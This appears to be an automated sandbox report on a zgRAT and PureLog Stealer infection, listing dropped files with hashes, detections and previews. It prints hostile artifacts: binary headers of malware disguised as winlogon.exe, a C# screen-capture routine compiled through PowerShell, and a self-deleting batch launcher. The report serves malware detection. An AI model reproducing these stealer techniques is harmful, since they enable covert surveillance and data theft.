Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\winlogon.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\winlogon.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\Public\Pictures\7565e71fcce1ad

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with very long lines (393), with no line terminators
Category:	dropped
Size (bytes):	393
Entropy (8bit):	5.87061182098536
Encrypted:	false
SSDEEP:	6:eG7qah4TWoNJ1bRHpn0IkN+awloMHm8/uGNssJBkGwzSXIHhADOekfTufs:72PbP0RGHmkuGNssJq+/DOekfTuU
MD5:	85734B19D77BA989E767BA3195EEA520
SHA1:	0E37ADBFC1A4347A193BE22687AA4D39A2E04C5F
SHA-256:	9DCD04CBDED20E30CB016766C1030D73B848EA423E21C8256DD84F0D41C61D95
SHA-512:	FDC81A32A858628B666083554BFE1E46F97F933E432825C23283F784C6A5ABEEA3EF88D64F75AA625386875EA39AC0C036F2D5673980CBFDBDA78B3557D4F35A
Malicious:	false
Preview:	BmF29bEIasORUOD0AKSwuVtZFCjrfs689BL4LPatuzZBoahAHwrpAmnp3qx61XmrwPSSDIpuuiB55supfijsAR8WYfBfcd2XMsPYIO79H74blrtK5HbSx3qfR54hGKSQqosNcWhQlklDWhvqw0jUBkjTBuHMUa27onv78gsikLrNRnIuKNvQk7OFEZMsPU6KroZswysPIBu03VBXlXBHpmWqYp2iU9TPOgfnOZ8WefHjNYMtYyG1SyeFRsUG6J5IrelW0XJMZpmKexdAcJKf3c7aBaVgF1aVj92tw02Ao4cnMUkePTow8ZPPhLUZBnGhPRkf5tOmQJ199UOrz1QvNnWJtnMkgd8Ax5X4uFifECgyiPPN7nkKWUUm4bvShoFxL0MD6T6uS

C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Pictures\wouVpTZDoyPyABKEH.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ChainComServermonitor.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
MD5:	0C47412B6C6EF6C70D4B96E4717A5D3B
SHA1:	666FCC7898B52264D8A144600D7A3B0B59E39D66
SHA-256:	0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
SHA-512:	4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

C:\Users\user\AppData\Local\Temp\ ?? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	672852
Entropy (8bit):	7.923034694323039
Encrypted:	false
SSDEEP:	12288:mVeAAv2LReLVHg/7wrGWfpc6THJvOocm4yE9EoFxHvA/F+M1ccKakS:Kv8gReLVHY7y3fxVvOoZ+HA8M1oakS
MD5:	35EAF361DBF4297DFCCF215E8BF1B610
SHA1:	28335B0AFB851CD9F34C45963CC1EF4D51FD95F2
SHA-256:	3F90881C688845CF94EA03697FF7D6637EC300F326752B437EFAA8C1CB487809
SHA-512:	9D687437F7134B2606EBCCADDB6C272C3055EC7E0672273D1C75D5855839CCA5BDE52F24F93E9F5E622357C8393EDD492BBCC7728FB5A68B222EF7D4781846EA
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G....y....;.5.....U.=3...o.Q..y.$. <T.].AB./...$......G.".t.H.. &.....#..2w.#..Z...."..<.B.Y_...s..i.<>....s..Q......I.......Y0./.O.....>.h?.oBf*..{M..8.9f....I..>\`..4.......\|..E1..'..8\|.J....b.....t....a.c..{..#.9.G....s.M..G...../...i.Y$...(f......;.J......{n_4.w..2.....n.G....e..".......`.m......y.M......?...7-....l(..3.{C.7.....7.E.}..-.........^?.........z..}.[....u...k..~m;.Z.z.y.5s...._3..;..J..^.V....1...3/....\|......X...k...zE.$s..i....9.=39?{H....xf.K.Y...../+h=s..ml.K.N...g.\|i.}.%..bU...[y.e%........r.0..{..if.KRw..Sg.......cZ...W.tyZ.kV.q%.\...<..}a....t.Y_F....c.!.+..8../...zv...{}...ml......s..k.W..........2......f.:?u.<..5../.V.;{.[.V..b......H.......?...(....3..{>s.....\.{...9..\|f.s........3.0..........]...\|n...2_.[...b...n.c.+w....t.{.W...s;..y.z.N.n.....s...q.@n.n.w.c^.....Y....%.Z}..EN..3V.

C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.367252340551585
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikOfkWZEifXx:V3ka6KOkqeFkOfFEifXx
MD5:	D3E546274680FADD8E071EE7F523249F
SHA1:	D5772872A693367F7ABC2544F9C80CCF2EDE80D5
SHA-256:	EF88CB14E815EE0E0B7A7A2103BFB4D84FF3FF220C149D1AF2B200172258AA9D
SHA-512:	0BBC15DB875EDD705791460AFBCEEC9B4BD71DB3DCA60C34AC0D3ADE78B26CA9CC9DCC0860920834B6EE30EA36D3D592E5C5EC100C3B4078D45AA4DDED4E1A90
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.0.cs"

C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.164512611044669
Encrypted:	false
SSDEEP:	48:6Dc7oEAtf0KhzBU/Qf6mtJvN0ptpW1ulfYa3sXq:sNz0fmnOPdYKs
MD5:	EEF624FFB707F1AE311D968494F4EDBE
SHA1:	6DDB54F928BC8B7F22982295FEC7D8B2C6490E95
SHA-256:	038E45271BC8B5E42C1DB5374835AFD159CC19D7269AAC8FC7E0387C2B374B2E
SHA-512:	3064650F3E853C2B484D1823927B4796D50A986024352E398FB24995520068CDA9CF7EAEAD74DBC54DF7CFBDD72F9FCA26886D78D03CEA54E6306F85128937DA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1149
Entropy (8bit):	5.520247775191603
Encrypted:	false
SSDEEP:	24:KJfNI/Id3ka6KOkqeFkOfFEifXUKax5DqBVKVrdFAMBJTH:uNI/kka6NkqeFkyFEuXUK2DcVKdBJj
MD5:	6355D9AC9A7C767F555529A18F667406
SHA1:	E15DDC54BA7B38F5AE227CEF4EC03B2D43A59A6B
SHA-256:	89BEC08D3A3F17FEC8EBB56CA219176094195613252BC6108B86278EE3B14449
SHA-512:	013720A1A76C8A5A73BFE780D2329038F6CE927A6EB34122F2FBF6746EE7DD70D50A2F815611159EFB07C961CAA2421406C55AEF5419EE7953B0705EA11DD983
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

C:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1009853876306326
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNYak7YnqqsNPN5Dlq5J:+RI+ycuZhNfYakSsNPNnqX
MD5:	9502A89DECABA7AD8DEBDFFD0CE8B663
SHA1:	D059F94751248C5E47BAF47929FBC96DCC2A7DEC
SHA-256:	6FD6E4854CC740C24FBCAB96F87333A8DB2F699FBB3D00C15624E419578C8359
SHA-512:	ABAE10785558744F4C5ABE2E729A1B060F5C630D83CDAD0A62C0E8C744C01CABB772A883B2E9C85D2128DCA7F7C000FA5E9C8A2DBF6BB33644BDF29533A7A79C
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.k.u.g.0.k.j.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.k.u.g.0.k.j.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\E9LXmGxXsL.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	255
Entropy (8bit):	5.2198510638264
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEaQIH11XmrKKOZG1wkn23fL/Ekh:HTg9uYDEarV1Xmrgfwkh
MD5:	4C481E12A345F8031B1C15FF8D4A0109
SHA1:	3FF762B415EA2E64F6841E005DD40BF629ACDADF
SHA-256:	D9899BA679E61769E56B5F1FF631EB65951CAC1A1EEE3B4F6F936686B2F8198F
SHA-512:	F8BBF339EC187838AAA45BF1606880C56EC544456FF217191DEC352386BE9398D3B19B2CE2F66A07A47B0D5519B40DDAA03793DCC6BA9DAED788F902D7289470
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\E9LXmGxXsL.bat"

C:\Users\user\AppData\Local\Temp\F7KJmiizqn

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.1834651896016455
Encrypted:	false
SSDEEP:	3:hjUwKAuLecPjLn:hgwhut
MD5:	9E58D6A3B07A2DD17F52EA3B9400C3AD
SHA1:	A6A85B9B972D0B781D5DD8DB10B889A6E6E48ADE
SHA-256:	6DD18FCCB53F77DA059D2E0C9D80AF01182A0DB5C24A3890F9198A1CF9743632
SHA-512:	96A3E22D2EC27DA667487ED7FAA8A28007BE3C2F637AD81BC216E12798E77E11F6E2EBA800C1361A6CA23A315444A90EBAA9DAF73BEB95532356077D4F1A912D
Malicious:	false
Preview:	d0YFSFUDUoN1KDxmyD6GzQjFn

C:\Users\user\AppData\Local\Temp\RES46F0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Aug 1 23:29:42 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.138578893019934
Encrypted:	false
SSDEEP:	24:HJwq9s+fZsUDfHmQwKefNnmNII+ycuZhNfYakSsNPNnqS+d:pRqSOKCNmu1ulfYa3sXqSe
MD5:	C59AADE4C45538715E3FC734F043D537
SHA1:	E743AA2EC6AA4300A77E6CBC262D2999A9FBEBCC
SHA-256:	230A6EEEF7C94D6A172F7AADC3AD2885326501B1CF96FDB8E26AE4009DA162E1
SHA-512:	2F8825BD0923C7CCB2F20A9CFBCD5F8566C2FA0960539030C7AAAE45EC947A020E1F5EFC732E4B19D000BD33CECA88AC5405392D36D25EAB58472B7F0187AC6F
Malicious:	false
Preview:	L...f..f.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP...........................c..........4.......C:\Users\user\AppData\Local\Temp\RES46F0.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.k.u.g.0.k.j.4...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\RES541F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x704, 10 symbols, created Thu Aug 1 23:29:46 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1980
Entropy (8bit):	4.588871369211372
Encrypted:	false
SSDEEP:	24:Hwjm9+XOlDfHDwKRfCWYN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+SUZ:f50KJCWYyluOulajfqXSfbNtmh9Z
MD5:	7D8DAEE1881B7CB65AE18E171BFD0248
SHA1:	6C12B133D8BBFAE628AE98C7AA7A3D93C7A53734
SHA-256:	431DD4EA8894836688039DC61B43CD82ADE990686F09105791ABC2CC1C7260C7
SHA-512:	8D0C18AA1F3C6F96534A5F0DD74FA45B2E81F39B76FB7523AE5B93344B8C8F49EA035D0CE50F322B1398C3415736F815598CE909A57F4DEF05FD6AD7FCA8D031
Malicious:	false
Preview:	L...j..f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........p...................@..@........<....c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES541F.tmp.-.<....................a..Microsoft (R) CVTRES.}.=..cwd.C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.

C:\Users\user\AppData\Local\Temp\_MEI17002\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	46064
Entropy (8bit):	7.796865894568779
Encrypted:	false
SSDEEP:	768:V3CnjEFEHH57WfWzAPpIe7zOsupVPW9zxtrXhcwKnXffpI3IvtVHeDYiSyv6RqeA:V6jEFO7WffITsMw9vrxcpnPq3IvtVHs9
MD5:	C24B301F99A05305AC06C35F7F50307F
SHA1:	0CEE6DE0EA38A4C8C02BF92644DB17E8FAA7093B
SHA-256:	C665F60B1663544FACF9A026F5A87C8445558D7794BAFF56E42E65671D5ADC24
SHA-512:	936D16FEA3569A32A9941D58263E951623F4927A853C01EE187364DF95CD246B3826E7B8423AC3C265965EE8E491275E908AC9E2D63F3ABC5F721ADD8E20F699
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..m..m..m..=m..m...l..m..Sm..m...l..m...l..m...l..mf..l..mt..l..m..m..mf..l..mf..l..mf.Qm..mf..l..mRich..m........................PE..d....(.b.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56816
Entropy (8bit):	7.830032396611692
Encrypted:	false
SSDEEP:	1536:z4eSBuhlC82gmmCm7jDCxU6esTzvIvQPnY7Syp96:kPAH4gZT7qxU6vTbIvQPnYv96
MD5:	5C0BDA19C6BC2D6D8081B16B2834134E
SHA1:	41370ACD9CC21165DD1D4AA064588D597A84EBBE
SHA-256:	5E7192C18AD73DAA71EFADE0149FBCAF734C280A6EE346525EA5D9729036194E
SHA-512:	B1B45FCBB1E39CB6BA7AC5F6828EE9C54767EABEEDCA35A79E7BA49FD17AD20588964F28D06A2DCF8B0446E90F1DB41D3FCA97D1A9612F6CC5EB816BD9DCDF8A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3c..3c..3c..K...3c..Fb..3c..Ff..3c..Fg..3c..F`..3c..Fb..3c..Ag..3c..Ab..3c.HZb..3c..3b.:3c..Fn..3c..Fc..3c..F...3c..Fa..3c.Rich.3c.........PE..d....(.b.........." .............p...........................................@............`.........................................H<.......9.......0.......................<.......................................&..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI17002\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\based.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105456
Entropy (8bit):	7.934837610567248
Encrypted:	false
SSDEEP:	1536:oLDiGfp+9JSNhsyzp72hnyE8E24ZllDUD1RPC/J3KPKu8URMIv5q5pM7SyqL:owcV0nyE32kvDUhRa1uHqIv5q5pMsL
MD5:	604154D16E9A3020B9AD3B6312F5479C
SHA1:	27C874B052D5E7F4182A4EAD6B0486E3D0FAF4DA
SHA-256:	3C7585E75FA1E8604D8C408F77995B30F90C54A0F2FF5021E14FA7F84E093FB6
SHA-512:	37CE86FD8165FC51EBE568D7CE4B5EA8C1598114558D9F74A748A07DC62A1CC5D50FE1448DDE6496EA13E45631E231221C15A64CEBBB18FA96E2F71C61BE0DB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
